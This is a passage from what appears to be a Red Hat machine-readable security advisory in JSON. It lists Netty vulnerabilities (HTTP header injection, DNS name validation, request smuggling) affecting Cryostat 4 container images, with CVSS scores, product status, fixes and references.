"name": "Improper Neutralization of CRLF Sequences (\u0027CRLF Injection\u0027)"
},
"discovery_date": "2026-05-13T19:02:00.826936+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477226"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty. The HttpProxyHandler component, which handles HTTP CONNECT requests, does not properly validate user-provided outbound headers. This allows an attacker to inject arbitrary HTTP headers into the CONNECT request sent to the proxy server. This could lead to unexpected behavior or potential bypass of security controls on the proxy server.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty: io.netty/netty-handler-proxy: Netty: HTTP Header Injection via HttpProxyHandler Disabled Validation",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
],
"known_not_affected": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42578"
},
{
"category": "external",
"summary": "RHBZ#2477226",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477226"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42578",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42578"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42578",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42578"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-45q3-82m4-75jr",
"url": "https://github.com/netty/netty/security/advisories/GHSA-45q3-82m4-75jr"
}
],
"release_date": "2026-05-13T17:57:43.538000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-22T17:15:26+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:28010"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "netty: io.netty/netty-handler-proxy: Netty: HTTP Header Injection via HttpProxyHandler Disabled Validation"
},
{
"cve": "CVE-2026-42579",
"cwe": {
"id": "CWE-1286",
"name": "Improper Validation of Syntactic Correctness of Input"
},
"discovery_date": "2026-05-13T19:01:25.062732+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477217"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty. Netty\u0027s DNS (Domain Name System) codec does not properly enforce domain name constraints as defined in RFC 1035 during both encoding and decoding processes. This vulnerability allows a remote attacker to exploit the decoder using malicious DNS responses or exploit the encoder through user-influenced hostnames, leading to a high integrity impact on the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty: Netty: High integrity impact due to improper DNS domain name constraint enforcement",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important integrity flaw in Netty\u0027s DNS codec. The vulnerability arises from insufficient enforcement of RFC 1035 domain name constraints during both encoding and decoding, allowing remote attackers to manipulate DNS responses or user-controlled hostnames. This could lead to a high integrity impact on affected Red Hat products that utilize the vulnerable Netty DNS codec.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
],
"known_not_affected": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42579"
},
{
"category": "external",
"summary": "RHBZ#2477217",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477217"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42579",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42579"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42579",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42579"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-cm33-6792-r9fm",
"url": "https://github.com/netty/netty/security/advisories/GHSA-cm33-6792-r9fm"
}
],
"release_date": "2026-05-13T18:01:52.500000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-22T17:15:26+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:28010"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "netty: Netty: High integrity impact due to improper DNS domain name constraint enforcement"
},
{
"cve": "CVE-2026-42581",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2026-05-13T19:02:26.404511+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
